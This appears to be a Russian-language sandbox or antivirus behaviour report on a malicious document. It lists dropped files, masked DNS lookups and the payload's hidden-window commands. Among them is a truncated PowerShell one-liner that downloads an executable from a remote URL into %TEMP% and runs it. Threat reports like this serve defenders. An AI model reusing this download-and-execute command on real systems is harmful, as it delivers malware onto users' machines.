Техническая информация
- $bkruk как %temp%\yrffgox0.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function zpmpfy5([String] $bkruk){(New-Object System.Net.WebClient).DownloadFile($bkruk,''%TEMP%\Yrffgox0.exe'');Start-Process ''%TEMP%\Yrffgox0.exe'';}try{zpmpfy5(...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1924
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\ycwy.bat
- %TEMP%\1367036.cvr
- 'ba###teks.com':80
- http://ba###teks.com/lopinost.bin
- DNS ASK ba###teks.com
- DNS ASK rs###tria.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function zpmpfy5([String] $bkruk){(New-Object System.Net.WebClient).DownloadFile($bkruk,''%TEMP%\Yrffgox0.exe'');Start-Process ''%TEMP%\Yrffgox0.exe'';}try{zpmpfy5(...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Ycwy.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Ycwy.bat" "